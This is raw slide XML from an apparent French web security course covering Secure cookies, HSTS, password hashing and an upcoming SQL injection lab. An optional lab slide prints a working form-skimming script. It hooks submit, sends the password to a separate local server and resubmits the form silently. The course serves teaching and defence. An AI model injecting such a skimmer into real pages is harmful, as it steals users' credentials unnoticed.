                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  next();</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 ou : app.use(helmet.hsts({ maxAge: 31536000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HSTS est un header. Le navigateur s’en souvient (max-age). La prochaine visite HTTP n’a pas lieu : il passe en HTTPS tout seul. includeSubDomains une fois que tous les cousins sont prêts. preload = Chrome. Plus tard.</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 fait le flag Secure — et ce qu’il ne fait pas</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comparer S2 et S4 dans DevTools</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à quoi sert HSTS, en une phrase</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89811" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTPS, Secure, HSTS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 fait le flag Secure — et ce qu’il ne fait pas</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Il retient le cookie en HTTP. Il ne cache rien à JavaScript. Ce n’est pas HttpOnly.</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comparer S2 et S4 dans DevTools</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Même login. Set-Cookie : Secure absent vs présent. HTTP : S2 part, S4 non.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="334670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45643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47472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à quoi sert HSTS, en une phrase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="380390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Le navigateur refuse de retomber en HTTP. La porte reste fermée.</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5</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Bilan du jour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58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05</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Bilan du jour 1</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20 min  ·  demain : une apostrophe, du PHP dans une note, un schéma</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5</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Bilan du jour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59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Ce que vous savez faire ce soir</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Sans notes, à voix haute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tracer une trust boundary sur un login cookie</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durcir un Set-Cookie (HttpOnly, Secure, SameSite)</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ranger un mot de passe en argon2id, pas en SHA-256</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3749040"/>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97280" y="3858768"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="3877056"/>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lire HSTS et Secure dans DevTools</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5</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Bilan du jour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EXTRA  ·  si vous avez fini à l’heure</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Un XSS maison : 8012 écoute, 8014 consomme</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day-1/s5_recap</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local  ·  day-1/s5_recap</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Optionnel. Vous avez fini le programme du jour. Lisez le README.</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Un script XSS est servi sur :8012. Un site consommateur tourne sur :8014.</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Le script s’importe dans le &lt;head&gt; de 8014. Il écoute le formulaire.</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Capturer le mot de passe à la soumission, puis laisser le formulaire partir.</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Lancer les deux serveurs (README). Sur 8014, le &lt;head&gt; charge http://127.0.0.1:8012/xss.js.</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submit : preventDefault, lire le password, l’envoyer à 8012.</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Puis form.submit() natif : la soumission reprend. L’utilisateur n’a rien vu.</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1</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5</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Bilan du jour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EXTRA · à coller</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Écouter, voler, laisser partir</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8014  ·  le consommateur, dans le head</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&lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;script src="http://127.0.0.1:8012/xss.js"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/head&gt;</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8012  ·  xss.js</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document.addEventListener("submit", async (event) =&gt; {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  const form = event.target;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  if (!(form instanceof HTMLFormElement)) return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  event.preventDefault();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  const password = form.querySelector("[type=password]")?.value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  await fetch("http://127.0.0.1:8012/collect", {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    method: "POST",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    headers: { "Content-Type": "application/json" },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    body: JSON.stringify({ password }),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  form.submit();  // natif : plus d'écouteur, le formulaire part</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>});</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preventDefault arrête le POST. Vous lisez. Vous renvoyez. form.submit() reprend sans re-déclencher l’écouteur. C’est le vol discret.</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62 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cover-hero-day2-1296x1236.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6263640" y="457200"/>
            <a:ext cx="5925312" cy="5650992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="457200"/>
            <a:ext cx="5806440"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1965960"/>
            <a:ext cx="5029200" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JOUR  2  ·  intermédiaire, beaucoup de pratique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2377440"/>
            <a:ext cx="5029200" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection, PHP dans les notes, valider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3931920"/>
            <a:ext cx="5029200" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On commence par une apostrophe. Ensuite ça dégénère. Puis on pose un schéma.</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63 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>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585216"/>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JOUR  2  ·  AU PROGRAMME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="859536"/>
            <a:ext cx="10058400" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ce que nous discutons aujourd’hui</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1335024"/>
            <a:ext cx="101498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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1536192"/>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4" name="TextBox 13">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="1554480"/>
            <a:ext cx="6949440" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection  ·  une apostrophe, puis le lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId5"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="1572768"/>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2 h 30 · lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1956816"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2286000"/>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18" name="TextBox 17">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="2304288"/>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Easy Clipboard  ·  un plugin PHP gratuit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId6"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="2322576"/>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2 h · lab live</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="2706624"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3035808"/>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2" name="TextBox 21">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="3054096"/>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Valider le JSON  ·  Pydantic et express-validator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId7"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="3072384"/>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1 h · lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3456432"/>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a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="3785615"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874519" y="3803903"/>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Après-midi  ·  recap SQLi + hash + rôle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:hlinkClick action="ppaction://hlinksldjump" r:id="rId8"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869680" y="3822191"/>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1 h 30 · lab</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64 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>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Lexique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>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Les mots de cette section, sans jargon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="10058400" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On les revoit dans les labs. Ici : une phrase chacun.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1444751"/>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1005840" y="1444751"/>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325880" y="148132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SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="170078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On glisse du SQL dans un champ. La base l’exécute comme si c’était votre requête.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="223113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223113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25880" y="226771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Requête paramétrée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2487168"/>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SQL d’un côté, la valeur de l’autre. L’apostrophe reste une apostrophe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3017520"/>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05840" y="3017520"/>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325880" y="3054096"/>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Code injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="3273552"/>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La note n’est plus du texte. Le serveur l’exécute. PHP, eval, un include : même famille.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="38039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1005840" y="38039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325880" y="38404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Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="40599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Un schéma (Pydantic, express-validator) jette le JSON pourri. Ça n’empêche pas une concaténation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="45902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005840" y="45902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325880" y="46268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Rainbow table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="48463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On hashe des candidats, on compare. On ne déchiffre rien. Jour 1, Lab B.</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65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01</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SQL injection — une apostrophe, et ça part</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d’abord une console SQLite  ·  ensuite le geste  ·  puis l’injection</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s1_01_intro</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Interroger une base locale, avant d’injecter</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day-2/s1_01_intro  ·  port 8021. Flask ou Express, même page, même seed.sql.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vous écrivez un SELECT. Ce n’est pas encore une injection. L’injection, c’est quand l’app colle votre saisie dans SA requête.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d2s1-sqlite-intro.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3588888" y="1591056"/>
            <a:ext cx="4983743"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Table notes : id, title, body, author, is_public. SELECT * / WHERE / GROUP BY. PRAGMA query_only = ON.</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à lire</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Le minimum, Node ou Python — à vous de choisir</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="11155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local  ·  day-2/s1_01_intro  ·  README : Flask :8021 ou Express :8021</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="138988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389888"/>
            <a:ext cx="64008" cy="132588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207008" y="146304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Express  ·  node:sqlite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="170078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database.exec("PRAGMA query_only = ON");   // lecture seule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sql = normaliseSelect(request.body.sql);   // SELECT, une seule requête</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
